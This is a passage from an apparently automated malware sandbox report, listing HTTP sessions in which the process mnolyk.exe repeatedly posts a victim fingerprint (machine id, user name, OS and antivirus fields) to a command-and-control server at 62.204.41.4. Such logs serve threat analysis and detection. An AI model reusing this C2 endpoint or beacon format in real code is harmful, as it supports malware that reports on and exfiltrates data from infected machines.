                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:53.893883944 CET | 530 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      416 | 192.168.2.7 | 50111 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:54.086077929 CET | 531 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:54.151463032 CET | 531 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      417 | 192.168.2.7 | 50112 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:54.333220005 CET | 532 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:54.396852970 CET | 532 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      418 | 192.168.2.7 | 50113 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:54.584709883 CET | 533 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:54.649357080 CET | 533 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      419 | 192.168.2.7 | 50114 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:54.813585997 CET | 534 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:54.876275063 CET | 534 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      42 | 192.168.2.7 | 49736 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:11.796308994 CET | 146 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:11.859110117 CET | 146 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      420 | 192.168.2.7 | 50115 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:55.052783012 CET | 535 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:55.117238998 CET | 535 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      421 | 192.168.2.7 | 50116 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:55.305221081 CET | 536 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:55.369998932 CET | 536 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      422 | 192.168.2.7 | 50117 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:55.559827089 CET | 537 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:55.626091957 CET | 537 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      423 | 192.168.2.7 | 50118 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:55.823225021 CET | 538 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:55.888909101 CET | 538 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      424 | 192.168.2.7 | 50119 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:56.055732012 CET | 539 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:56.118506908 CET | 539 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      425 | 192.168.2.7 | 50120 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:56.307441950 CET | 540 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:56.370866060 CET | 540 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      426 | 192.168.2.7 | 50121 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:56.541604042 CET | 541 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:56.608396053 CET | 541 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      427 | 192.168.2.7 | 50122 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:56.823302031 CET | 542 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:56.890953064 CET | 542 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      428 | 192.168.2.7 | 50123 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:57.096759081 CET | 543 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:57.161602974 CET | 543 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      429 | 192.168.2.7 | 50124 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:57.344638109 CET | 544 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:57.409598112 CET | 544 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      43 | 192.168.2.7 | 49737 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:12.033255100 CET | 147 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:12.100027084 CET | 147 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      430 | 192.168.2.7 | 50125 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:57.600770950 CET | 545 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:57.666326046 CET | 545 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      431 | 192.168.2.7 | 50126 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:57.855566978 CET | 546 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:57.920010090 CET | 546 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
